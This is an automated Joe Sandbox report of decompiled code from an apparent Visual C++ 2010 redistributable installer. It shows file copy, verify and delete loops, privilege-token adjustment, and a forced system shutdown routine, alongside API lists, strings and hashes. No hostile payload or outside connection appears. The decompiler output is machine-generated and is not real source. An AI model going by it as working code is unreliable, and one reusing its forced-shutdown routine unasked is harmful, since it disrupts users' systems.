						if(E0100618D(_t220,  &_v1788, 0x3e8) == 0) {
							goto L87;
						}
						_t239 = strchr( &_v1788, 0x3d);
						 *0x100d07c = _t239;
						if(_t239 == 0) {
							goto L92;
						}
						while(1) {
							_t239 =  &(_t239[1]);
							 *0x100d07c = _t239;
							_t314 =  *_t239;
							if(_t314 == 0) {
								break;
							}
							__eflags = _t314 - 0x20;
							if(_t314 > 0x20) {
								break;
							}
						}
						 *0x100ce0c = _t327;
						 *0x100d07c = E01003E3A(_t239);
						 *0x101d3e4 = 0x100d080;
						goto L92;
					}
					while(1) {
						_v2112 = 0;
						if(E010060BE(_v2116, 0,  &_v1788, 0x3e8) == 0) {
							goto L62;
						}
						_t352 =  *0x100c4b4; // 0x1
						if(_t352 == 0) {
							SendDlgItemMessageA( *0x100ce04, 0x68, 0xc, 0,  &_v1788);
						}
						E01002BC4("c:\4863269369430a9b27",  &_v1788,  &_v528);
						if(E010060BE(_v2116, 1,  &_v268, 0x104) != 0) {
							_strlwr( &_v268);
							_pop(_t307);
							E0100360C(0, _t307, _t325, _v2124);
							_t255 =  *0x100c044( &_v528, 0x1470000, 0, 0, 0, 0, 0, 0x104,  &_v788);
							_v2112 = _t255;
							if(_t255 != 0) {
								L53:
								_strlwr( &_v788);
								_t325 =  &_v788;
								_t334 =  &_v268;
								while(1) {
									_t307 =  *_t334;
									_t258 = _t307;
									if(_t307 !=  *_t325) {
										break;
									}
									if(_t258 == 0) {
										L58:
										_t258 = 0;
										L60:
										if(_t258 != 0) {
											_v2112 = 0;
										}
										goto L62;
									}
									_t307 =  *((intOrPtr*)(_t334 + 1));
									_t258 = _t307;
									if(_t307 != _t325[1]) {
										break;
									}
									_t334 = _t334 + 2;
									_t325 =  &(_t325[2]);
									if(_t258 != 0) {
										continue;
									}
									goto L58;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L60;
							}
							if(GetLastError() == 5 && E010044AD( &_v528, _t325) != 0 && MoveFileA( &_v528, _t325) != 0) {
								_v2112 =  *0x100c044(_t325, 0x1470000, 0, 0, 0, 0, 0, 0x104,  &_v788);
								if(MoveFileA(_t325,  &_v528) == 0) {
									_v2112 = 0;
								}
							}
							if(_v2112 == 0) {
								goto L62;
							} else {
								goto L53;
							}
						}
						L62:
						_v2120 = _v2120 & _v2112;
						_t244 = E0100608F(0, _t325, _v2116, "verify");
						_v2116 = _t244;
						if(_t244 != 0) {
							_t325 = 0x100ce20;
							continue;
						}
						goto L63;
					}
				}
				do {
					_v2112 = 0;
					if(E010060BE(_v2116, 0,  &_v1788, 0x3e8) != 0) {
						_t340 =  *0x100c4b4; // 0x1
						if(_t340 == 0) {
							SendDlgItemMessageA( *0x100ce04, 0x68, 0xc, 0,  &_v1788);
						}
						E01002BC4("c:\4863269369430a9b27",  &_v1788,  &_v268);
						if(E010060BE(_v2116, 1,  &_v1788, 0x3e8) != 0) {
							E01002BC4("c:\4863269369430a9b27",  &_v1788,  &_v528);
							_t283 = strstr( &_v268, "\\..\\");
							_pop(_t307);
							if(_t283 == 0) {
								E01004590( &_v268, 0, 0);
								E0100447F(0x100c004,  &_v268);
								SetFileAttributesA( &_v268, 0x80);
								_t292 = CopyFileA( &_v528,  &_v268, 0);
								_v2112 = _t292;
								if(_t292 == 0 && GetLastError() == 5 && E0100453F( &_v528,  &_v268, _t325, 0x100c3a0) != 0) {
									_t346 =  *0x100c3a0; // 0x0
									_t307 = 0x100c3a0;
									if(_t346 == 0) {
										_t307 =  &_v268;
									}
									_t347 =  *0x100ce20; // 0x0
									_t299 = _t325;
									if(_t347 == 0) {
										_t299 =  &_v528;
									}
									_v2112 = CopyFileA(_t299, _t307, 0);
									if(E0100373C( &_v528,  &_v268, _t325, 0x100c3a0) == 0) {
										_v2112 = 0;
									}
								}
								SetFileAttributesA( &_v268, 0x80);
							}
						}
					}
					_v2120 = _v2120 & _v2112;
					_t273 = E0100608F(0, _t325, _v2116, "copy");
					_v2116 = _t273;
				} while (_t273 != 0);
				goto L39;
			}

0x010046b9
0x010046b9
0x010046c4
0x010046cc
0x010046cf
0x010046d2
0x010046d9
0x010046df
0x010046e9
0x010048fc
0x010048fc
0x01004900
0x01004703
0x01004709
0x0100470e
0x01004710
0x01004749
0x0100475d
0x01004762
0x01004764
0x0100477d
0x01004791
0x01004796
0x01004798
0x010047b4
0x0100479a
0x010047ad
0x010047ad
0x010047c6
0x010047cc
0x010047cf
0x010047d0
0x010047df
0x010047f0
0x01004801
0x0100480d
0x01004822
0x01004828
0x01004834
0x0100483a
0x0100483c
0x01004842
0x01004848
0x0100484e
0x01004851
0x0100486f
0x01004874
0x01004876
0x01004878
0x0100487e
0x01004883
0x01004885
0x01004885
0x0100488b
0x01004891
0x010048a2
0x010048a8
0x010048aa
0x010048aa
0x01004893
0x01004893
0x01004893
0x010048c1
0x010048da
0x010048df
0x010048e1
0x010048e3
0x010048e3
0x010048e1
0x01004876
0x01004851
0x01004842
0x010047d0
0x01004764
0x00000000
0x00000000
0x00000000
0x010048ef
0x010048ef
0x010048ef
0x010048f7
0x010048f7
0x01004911
0x01004918
0x0100491e
0x01004923
0x01004ae3
0x01004aee
0x01004af5
0x01004afb
0x01004cac
0x01004cac
0x01004cb1
0x01004cbd
0x01004e14
0x01004e16
0x01004e1c
0x00000000
0x00000000
0x01004ccc
0x01004cd6
0x01004cdb
0x01004cdd
0x01004e08
0x01004e0f
0x00000000
0x01004e0f
0x01004cf6
0x01004d07
0x01004d0d
0x01004d10
0x01004d11
0x00000000
0x00000000
0x01004d25
0x01004d2b
0x01004d2e
0x01004d34
0x00000000
0x00000000
0x01004d43
0x01004d4c
0x01004d4d
0x01004d4d
0x01004d4e
0x01004d4e
0x01004d55
0x00000000
0x00000000
0x01004d5b
0x01004d61
0x01004d75
0x01004d75
0x01004d7b
0x01004d85
0x01004d85
0x01004d87
0x01004d87
0x01004d89
0x01004d8c
0x01004d8d
0x01004d8d
0x01004d98
0x01004d9e
0x01004da0
0x01004da7
0x01004db9
0x01004dc6
0x01004dcc
0x01004dce
0x01004ddc
0x01004ddc
0x01004dce
0x01004de1
0x01004dee
0x01004df4
0x01004df4
0x01004e02
0x00000000
0x01004e02
0x01004e27
0x01004e33
0x01004e3a
0x01004e3f
0x01004ea8
0x01004eb4
0x01004eb9
0x01004ebb
0x01004ecc
0x01004ed1
0x01004ed3
0x01004ee1
0x01004ef9
0x01004f0a
0x01004f18
0x01004f1e
0x01004f22
0x01004f24
0x01004f24
0x01004f32
0x01004f32
0x01004ed3
0x01004f37
0x01004f37
0x01004f3d
0x01004f4b
0x01004f4b
0x01004f63
0x01004f63
0x01004e46
0x01004e55
0x00000000
0x00000000
0x01004e60
0x01004e6a
0x01004e6f
0x00000000
0x00000000
0x01004e7c
0x01004e7c
0x01004e7d
0x01004e82
0x01004e86
0x00000000
0x00000000
0x01004e77
0x01004e7a
0x00000000
0x00000000
0x01004e7a
0x01004e89
0x01004e94
0x01004e99
0x00000000
0x01004e99
0x01004b08
0x01004b20
0x01004b2d
0x00000000
0x00000000
0x01004b33
0x01004b39
0x01004b4d
0x01004b4d
0x01004b66
0x01004b82
0x01004b8f
0x01004b95
0x01004b9c
0x01004bba
0x01004bc2
0x01004bc8
0x01004c37
0x01004c3e
0x01004c45
0x01004c4b
0x01004c51
0x01004c51
0x01004c53
0x01004c57
0x00000000
0x00000000
0x01004c5b
0x01004c6f
0x01004c6f
0x01004c78
0x01004c7a
0x01004c7c
0x01004c7c
0x00000000
0x01004c7a
0x01004c5d
0x01004c60
0x01004c65
0x00000000
0x00000000
0x01004c68
0x01004c6a
0x01004c6d
0x00000000
0x00000000
0x00000000
0x01004c6d
0x01004c73
0x01004c75
0x00000000
0x01004c75
0x01004bd3
0x01004c11
0x01004c27
0x01004c29
0x01004c29
0x01004c27
0x01004c35
0x00000000
0x00000000
0x00000000
0x00000000
0x01004c35
0x01004c82
0x01004c88
0x01004c99
0x01004ca0
0x01004ca6
0x01004b03
0x00000000
0x01004b03
0x00000000
0x01004ca6
0x01004b08
0x0100492f
0x01004942
0x0100494f
0x01004955
0x0100495b
0x0100496f
0x0100496f
0x01004988
0x010049a8
0x010049c1
0x010049d2
0x010049db
0x010049dc
0x010049eb
0x010049fc
0x01004a0d
0x01004a22
0x01004a26
0x01004a2c
0x01004a56
0x01004a5c
0x01004a61
0x01004a63
0x01004a63
0x01004a69
0x01004a6f
0x01004a71
0x01004a73
0x01004a73
0x01004a83
0x01004a9f
0x01004aa1
0x01004aa1
0x01004a9f
0x01004ab3
0x01004ab3
0x010049dc
0x010049a8
0x01004abf
0x01004ad0
0x01004ad7
0x01004ad7
0x00000000

APIs

SendDlgItemMessageA.USER32(00000068,0000000C,00000000,?,00000000), ref: 01004730
strstr.MSVCRT ref: 010047C6
SetFileAttributesA.KERNEL32(?,00000080), ref: 01004801
GetLastError.KERNEL32 ref: 01004848
SendDlgItemMessageA.USER32(00000068,0000000C,00000000,?,?), ref: 0100496F
strstr.MSVCRT ref: 010049D2
SetFileAttributesA.KERNEL32(?,00000080), ref: 01004A0D
CopyFileA.KERNEL32 ref: 01004A22
GetLastError.KERNEL32 ref: 01004A2E
CopyFileA.KERNEL32 ref: 01004A7C
SetFileAttributesA.KERNEL32(?,00000080), ref: 01004AB3
SendDlgItemMessageA.USER32(00000068,0000000C,00000000,?,?), ref: 01004B4D
_strlwr.MSVCRT ref: 01004B8F
GetLastError.KERNEL32 ref: 01004BCA
MoveFileA.KERNEL32 ref: 01004BEE
MoveFileA.KERNEL32 ref: 01004C1F
_strlwr.MSVCRT ref: 01004C3E
strstr.MSVCRT ref: 01004D07
FindFirstFileA.KERNEL32(?,?), ref: 01004D25
strrchr.MSVCRT ref: 01004D43
SendDlgItemMessageA.USER32(00000068,0000000C,00000000,?), ref: 01004D75
DeleteFileA.KERNEL32(?), ref: 01004D98
Sleep.KERNEL32(000001F4), ref: 01004DA7
SetFileAttributesA.KERNEL32(?,00000080), ref: 01004DB9
DeleteFileA.KERNEL32(?), ref: 01004DC6
FindNextFileA.KERNEL32(?,00000010), ref: 01004DEE
FindClose.KERNEL32(?), ref: 01004E02
strchr.MSVCRT ref: 01004E60
strrchr.MSVCRT ref: 01004F18
SendDlgItemMessageA.USER32(00000068,0000000C,00000000,010022BB,?), ref: 01004F4B

Strings

command, xrefs: 01004E22
\..\, xrefs: 010047C0, 010049CC, 01004D01
run, xrefs: 01004EA8
verify, xrefs: 01004AE3, 01004C8E
options, xrefs: 01004E27, 01004E2C, 01004EAD
copy, xrefs: 01004906, 01004AC5
c:\4863269369430a9b27, xrefs: 01004744, 01004778, 010047A8, 01004983, 010049BC, 01004B61, 01004CF1, 01004E99, 01004EF4
delete, xrefs: 01004CB1, 01004CB6, 01004E08
deltas, xrefs: 010046D2, 010046D7, 010048F5
p2H, xrefs: 01004E6A, 01004E7D, 01004E94, 01004F0A

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: File$ItemMessageSend$Attributes$ErrorFindLaststrstr$CopyDeleteMove_strlwrstrrchr$CloseFirstNextSleepstrchr
String ID: \..\$c:\4863269369430a9b27$command$copy$delete$deltas$options$p2H$run$verify
API String ID: 3851170777-4137633420
Opcode ID: 89faf3db3762656d20157f678ec9eb14baf6df118e99a81af9509fb5c0dc1727
Instruction ID: 1687914c5463bdb562aec54404296a2838319fe0694d4148413fc6cab1dc7c20
Opcode Fuzzy Hash: 89faf3db3762656d20157f678ec9eb14baf6df118e99a81af9509fb5c0dc1727
Instruction Fuzzy Hash: 06224E71940219AEFB63DBA4DC48FEA77BDAB14740F0045E6E2C9E2081DB759AC4CF64

Uniqueness

Uniqueness Score: -1.00%

Function 01003972 Relevance: 49.2, APIs: 20, Strings: 8, Instructions: 178
synchronizationlibraryshutdownCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E01003972(void* __ecx, void* __edx, void* __edi, void* __eflags, int _a4, int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v268;
				char _v528;
				signed char _v532;
				struct _OSVERSIONINFOA _v684;
				_Unknown_base(*)()* _v688;
				struct HINSTANCE__* _v692;
				intOrPtr _v696;
				char _v700;
				char _v716;
				void* __ebx;
				void* __esi;
				intOrPtr _t37;
				struct HINSTANCE__* _t44;
				void* _t46;
				void* _t49;
				long _t53;
				char* _t67;
				void* _t71;
				void* _t77;
				void* _t80;
				void* _t81;
				void* _t85;
				void* _t86;

				_t81 = __edi;
				_t80 = __edx;
				_t77 = __ecx;
				_t37 =  *0x100c028; // 0xb636
				_v8 = _t37;
				_v696 = _a16;
				_v700 = 0x10;
				_v688 = 0;
				_t86 = OpenEventA(0x100000, 0, "WFP_IDLE_TRIGGER");
				E0100346E(_t77, "Shutdown Initiated in Self Extractor ");
				if(_t86 == 0) {
					if(_a12 == 0) {
						_push(0x2710);
					} else {
						_push(0xea60);
					}
					Sleep();
				} else {
					WaitForSingleObject(_t86, 0xea60);
					CloseHandle(_t86);
				}
				if(E010034F4(_t80, 0x13, 0,  &_v716,  &_v700) != 0) {
					_t44 = LoadLibraryA("advapi32.dll");
					_v692 = _t44;
					if(_t44 != 0) {
						_v688 = GetProcAddress(_t44, "InitiateSystemShutdownExA");
					}
					if(WaitForSingleObject( *0x100cf24, 0) != 0) {
						_push(_t81);
						L13:
						L13:
						if(_v688 == 0) {
							_t46 = InitiateSystemShutdownA(0, 0, 0, _a8, _a4);
						} else {
							_t46 = _v688(0, _v696, 0, _a8, _a4, _a20);
						}
						_t86 = _t46;
						if(_t86 != 0) {
							goto L28;
						}
						_t53 = GetLastError();
						if(_t53 == 0x45b) {
							L21:
							_t86 = 1;
							goto L28;
						}
						if(_t53 == 0x4f7 || _t53 == 0x15) {
							if(WaitForSingleObject( *0x100cf24, 0xbb8) != 0) {
								goto L13;
							}
							goto L21;
						} else {
							E01003791( &_v528, 0x103, "InitiateSystemShutdown() Failed with error 0x%lx \n", GetLastError());
							E0100346E(_t77,  &_v528);
							_v684.dwOSVersionInfoSize = 0x94;
							GetVersionExA( &_v684);
							if(_v684.dwMajorVersion > 4) {
								_v684.dwOSVersionInfoSize = 0x9c;
								GetVersionExA( &_v684);
								if((_v532 & 0x00000040) != 0 && GetSystemDirectoryA( &_v268, 0x104) != 0) {
									_t67 = strchr( &_v268, 0x5c);
									_pop(_t77);
									_t67[1] = 0;
									_t85 = CreateFileA( &_v268, 0xc0000000, 7, 0, 3, 0x2000000, 0);
									if(_t85 != 0xffffffff) {
										_t86 = FlushFileBuffers(_t85);
										_t71 = CloseHandle(_t85);
										if(_t86 != 0) {
											__imp__NtShutdownSystem(1);
											_t86 = _t71;
										}
									}
								}
							}
						}
						L28:
						L29:
						if(_v692 != 0) {
							FreeLibrary(_v692);
						}
						E0100358B(_t77,  &_v716);
						if(_t86 < 0) {
							E0100346E(_t77, "ShutdownSystem: Failed ");
						}
						_t49 = _t86;
						goto L34;
					}
					_t86 = 1;
					goto L29;
				} else {
					E0100346E(_t77, "Failed to Adjust ENABLE_PRIVILEGE ");
					_t49 = 0;
					L34:
					return E010062FF(_t49, 0, _v8, _t80, _t86);
				}
			}

0x01003972
0x01003972
0x01003972
0x0100397d
0x0100398b
0x01003997
0x0100399d
0x010039a7
0x010039b8
0x010039ba
0x010039c1
0x010039db
0x010039e4
0x010039dd
0x010039dd
0x010039dd
0x010039e9
0x010039c3
0x010039c9
0x010039d0
0x010039d0
0x01003a07
0x01003a1f
0x01003a27
0x01003a2d
0x01003a3b
0x01003a3b
0x01003a50
0x01003a5a
0x00000000
0x01003a61
0x01003a67
0x01003a8b
0x01003a69
0x01003a7a
0x01003a7a
0x01003a91
0x01003a95
0x00000000
0x00000000
0x01003a9b
0x01003aa2
0x01003ac5
0x01003ac7
0x00000000
0x01003ac7
0x01003aa9
0x01003ac3
0x00000000
0x00000000
0x00000000
0x01003acd
0x01003ae1
0x01003af0
0x01003b02
0x01003b0c
0x01003b15
0x01003b22
0x01003b2c
0x01003b35
0x01003b56
0x01003b5d
0x01003b69
0x01003b7e
0x01003b83
0x01003b8d
0x01003b8f
0x01003b97
0x01003b9b
0x01003ba1
0x01003ba1
0x01003b97
0x01003b83
0x01003b35
0x01003b15
0x01003ba3
0x01003ba4
0x01003baa
0x01003bb2
0x01003bb2
0x01003bbf
0x01003bc6
0x01003bcd
0x01003bcd
0x01003bd2
0x00000000
0x01003bd2
0x01003a54
0x00000000
0x01003a09
0x01003a0e
0x01003a13
0x01003bd4
0x01003bdf
0x01003bdf

APIs

OpenEventA.KERNEL32(00100000,00000000,WFP_IDLE_TRIGGER), ref: 010039AD

Part of subcall function 0100346E: CloseHandle.KERNEL32(FFFFFFFF,?,?,?,010038D5,?,?,00000200,?), ref: 0100348A
Part of subcall function 0100346E: CreateFileA.KERNEL32(0100CD00,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,010038D5,?,?,00000200,?), ref: 010034B4
Part of subcall function 0100346E: CloseHandle.KERNEL32(FFFFFFFF,?,?,?,010038D5,?,?,00000200,?), ref: 010034DE

WaitForSingleObject.KERNEL32(00000000,0000EA60,Shutdown Initiated in Self Extractor ), ref: 010039C9
CloseHandle.KERNEL32(00000000), ref: 010039D0
Sleep.KERNEL32(00002710,Shutdown Initiated in Self Extractor ), ref: 010039E9
LoadLibraryA.KERNEL32(advapi32.dll), ref: 01003A1F
GetProcAddress.KERNEL32(00000000,InitiateSystemShutdownExA), ref: 01003A35
WaitForSingleObject.KERNEL32(00000000), ref: 01003A48
InitiateSystemShutdownA.ADVAPI32(00000000,00000000,00000000,?,?), ref: 01003A8B
GetLastError.KERNEL32 ref: 01003A9B
WaitForSingleObject.KERNEL32(00000BB8), ref: 01003ABB
GetLastError.KERNEL32 ref: 01003ACD
GetVersionExA.KERNEL32(?,?), ref: 01003B0C
GetVersionExA.KERNEL32(00000094), ref: 01003B2C
GetSystemDirectoryA.KERNEL32 ref: 01003B43
strchr.MSVCRT ref: 01003B56
CreateFileA.KERNEL32(?,C0000000,00000007,00000000,00000003,02000000,00000000), ref: 01003B78
FlushFileBuffers.KERNEL32(00000000), ref: 01003B86
CloseHandle.KERNEL32(00000000), ref: 01003B8F
NtShutdownSystem.NTDLL ref: 01003B9B
FreeLibrary.KERNEL32(?), ref: 01003BB2

Strings

InitiateSystemShutdownExA, xrefs: 01003A2F
@, xrefs: 01003B2E
InitiateSystemShutdown() Failed with error 0x%lx , xrefs: 01003AD0
advapi32.dll, xrefs: 01003A1A
WFP_IDLE_TRIGGER, xrefs: 01003984
Failed to Adjust ENABLE_PRIVILEGE , xrefs: 01003A09
ShutdownSystem: Failed , xrefs: 01003BC8
Shutdown Initiated in Self Extractor , xrefs: 010039B3

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: CloseHandle$FileObjectSingleSystemWait$CreateErrorLastLibraryShutdownVersion$AddressBuffersDirectoryEventFlushFreeInitiateLoadOpenProcSleepstrchr
String ID: @$Failed to Adjust ENABLE_PRIVILEGE $InitiateSystemShutdown() Failed with error 0x%lx $InitiateSystemShutdownExA$Shutdown Initiated in Self Extractor $ShutdownSystem: Failed $WFP_IDLE_TRIGGER$advapi32.dll
API String ID: 2638087656-3676156507
Opcode ID: 7a1c7a1b907803973f12d1bf947b1ffc3077485c6b2b2eb9657761a4e00d1aa0
Instruction ID: ea525c0ef0f58f0b04cd7f7f13f08e90f611286073571a1279888c73dc215274
Opcode Fuzzy Hash: 7a1c7a1b907803973f12d1bf947b1ffc3077485c6b2b2eb9657761a4e00d1aa0
Instruction Fuzzy Hash: D4517275900219AFFB73AB64DC8DEDE7BB9BB05304F0101A5F6C9AA081DB758A808B51

Uniqueness

Uniqueness Score: -1.00%

Function 0100358B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
nativeCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0100358B(void* __ecx, intOrPtr _a4) {
				void* _v8;
				void* _t7;
				void** _t8;

				_push(__ecx);
				if(_a4 == 0) {
					L6:
					_t7 = 0;
				} else {
					_t8 =  &_v8;
					__imp__NtOpenProcessToken(0xffffffff, 0x28, _t8);
					if(_t8 >= 0) {
						__imp__NtAdjustPrivilegesToken(_v8, 0, _a4, 0, 0, 0);
						if(_t8 < 0) {
							E0100346E(__ecx, "RestorePrivilege(): Failed To Restore Privilege ");
							NtClose(_v8);
							goto L6;
						} else {
							NtClose(_v8);
							_t7 = 1;
						}
					} else {
						E0100346E(__ecx, "RestorePrivilege():Failed To Open Process Token");
						goto L6;
					}
				}
				return _t7;
			}

0x01003590
0x01003597
0x010035ec
0x010035ec
0x01003599
0x01003599
0x010035a1
0x010035a9
0x010035c1
0x010035c9
0x010035de
0x010035e6
0x00000000
0x010035cb
0x010035ce
0x010035d6
0x010035d6
0x010035ab
0x010035b0
0x00000000
0x010035b0
0x010035a9
0x010035f0

APIs

NtOpenProcessToken.NTDLL ref: 010035A1
NtAdjustPrivilegesToken.NTDLL ref: 010035C1
NtClose.NTDLL ref: 010035CE

Part of subcall function 0100346E: CloseHandle.KERNEL32(FFFFFFFF,?,?,?,010038D5,?,?,00000200,?), ref: 0100348A
Part of subcall function 0100346E: CreateFileA.KERNEL32(0100CD00,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,010038D5,?,?,00000200,?), ref: 010034B4
Part of subcall function 0100346E: CloseHandle.KERNEL32(FFFFFFFF,?,?,?,010038D5,?,?,00000200,?), ref: 010034DE

Strings

RestorePrivilege():Failed To Open Process Token, xrefs: 010035AB
RestorePrivilege(): Failed To Restore Privilege , xrefs: 010035D9

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: Close$HandleToken$AdjustCreateFileOpenPrivilegesProcess
String ID: RestorePrivilege(): Failed To Restore Privilege $RestorePrivilege():Failed To Open Process Token
API String ID: 1340415033-792189412
Opcode ID: b8a0502ae2661f499545ef8694a518087c712bcdc019db68534c528b41fb345f
Instruction ID: 6003aa7cc984a04d304c8d02ce76eb40705ba2f6e4c4443cd9f7ac574e901191
Opcode Fuzzy Hash: b8a0502ae2661f499545ef8694a518087c712bcdc019db68534c528b41fb345f
Instruction Fuzzy Hash: DAF06235101119FFEB636BA28E0EDDF7EACEF16655F114020B695980A0D732CB00E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 010034F4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55nativeCOMMON

Download Yara Rule

APIs

NtOpenProcessToken.NTDLL ref: 0100352E
NtAdjustPrivilegesToken.NTDLL ref: 01003561
NtClose.NTDLL ref: 0100356E
NtClose.NTDLL ref: 01003579

Strings

NtOpenProcessToken Failed , xrefs: 01003538

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: CloseToken$AdjustOpenPrivilegesProcess
String ID: NtOpenProcessToken Failed
API String ID: 2239692276-916547032
Opcode ID: a2bb500f86ff3c270a923705cdf631df0a80daa1bbf9043a241c06063efd5071
Instruction ID: 86087f3b1aaf02d6297fc597292e47099355ceb0a226902c4fcc6e84a4753d95
Opcode Fuzzy Hash: a2bb500f86ff3c270a923705cdf631df0a80daa1bbf9043a241c06063efd5071
Instruction Fuzzy Hash: E311A07590010AAFEB13DFA8C908BEE7BA8FB04305F008125B9A5DE090D372D5009B91

Uniqueness

Uniqueness Score: -1.00%

Function 010062FF Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E010062FF(intOrPtr __eax, intOrPtr __ebx, signed int __ecx, intOrPtr __edx, intOrPtr __esi) {
				char _v0;
				intOrPtr _v8;
				intOrPtr _v804;
				char _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t18;
				signed int _t19;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t29;
				void* _t36;

				_t29 = __esi;
				_t24 = __edx;
				_t19 = __ecx;
				_t18 = __ebx;
				_t10 = __eax;
				_t36 = _t19 -  *0x100c028; // 0xb636
				if(_t36 != 0 || (__ecx & 0xffff0000) != 0) {
					_push(_t25);
					 *0x100c168 = _t10;
					 *0x100c164 = _t19;
					 *0x100c160 = _t24;
					 *0x100c15c = _t18;
					 *0x100c158 = _t29;
					 *0x100c154 = _t25;
					 *0x100c180 = ss;
					 *0x100c174 = cs;
					 *0x100c150 = ds;
					 *0x100c14c = es;
					 *0x100c148 = fs;
					 *0x100c144 = gs;
					asm("pushfd");
					_pop( *0x100c178);
					_t11 = _v0;
					 *0x100c17c =  &_v0 + 4;
					 *0x100c170 = _t11;
					 *0x100c0b8 = 0x10001;
					_t6 =  &_v0 - 4; // 0x35ff
					 *0x100c074 = _t11;
					_t12 =  *0x100c028; // 0xb636
					_v8 = _t12;
					_t13 =  *0x100c024; // 0xffff49c9
					_v8 = _t13;
					 *0x100c16c =  *_t6;
					 *0x100c068 = 0xc0000409;
					 *0x100c06c = 1;
					SetUnhandledExceptionFilter(0);
					UnhandledExceptionFilter(0x10025d8);
					_v804 = 1;
					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
				} else {
					return __eax;
				}
			}

0x010062ff
0x010062ff
0x010062ff
0x010062ff
0x010062ff
0x010062ff
0x01006305
0x01006325
0x01006326
0x0100632b
0x01006331
0x01006337
0x0100633d
0x01006343
0x01006349
0x01006350
0x01006357
0x0100635e
0x01006365
0x0100636c
0x01006373
0x01006374
0x0100637a
0x01006383
0x01006389
0x0100638e
0x0100639b
0x0100639e
0x010063a3
0x010063a8
0x010063ab
0x010063b3
0x010063b8
0x010063be
0x010063c8
0x010063ce
0x010063d9
0x010063e4
0x010063f9
0x0100630f
0x0100630f
0x0100630f

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 010063CE
UnhandledExceptionFilter.KERNEL32(010025D8), ref: 010063D9
GetCurrentProcess.KERNEL32(C0000409), ref: 010063EA
TerminateProcess.KERNEL32(00000000), ref: 010063F1

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 4382b4dedff7cdd383e5e3d049ffc534270b9df7dca4059a9d9760ad3e466a85
Instruction ID: 79cc3565e310fce42bdb6c08305b060dbc1bc5133d3f3caeb000c08a82c4a438
Opcode Fuzzy Hash: 4382b4dedff7cdd383e5e3d049ffc534270b9df7dca4059a9d9760ad3e466a85
Instruction Fuzzy Hash: 6C2102B4804200DBF727CF69E2586947BB0FB4A300F50839AF18987398E77A0585CF45

Uniqueness

Uniqueness Score: -1.00%

Function 01003E7A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 125
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E01003E7A(void* __edi, struct HWND__* _a4, intOrPtr _a8, signed short _a12) {
				intOrPtr _v8;
				void* _v268;
				char _v528;
				intOrPtr _v544;
				CHAR* _v548;
				long _v552;
				void _v560;
				void* __ebx;
				void* __esi;
				intOrPtr _t25;
				void* _t27;
				intOrPtr _t30;
				void* _t32;
				void* _t42;
				void* _t47;
				void* _t55;
				int _t59;
				signed int _t61;
				void* _t64;
				struct HWND__* _t71;

				_t25 =  *0x100c028; // 0xb636
				_v8 = _t25;
				_t27 = _a8 - 0x10;
				_t71 = _a4;
				if(_t27 == 0) {
					L13:
					_push(0);
					L14:
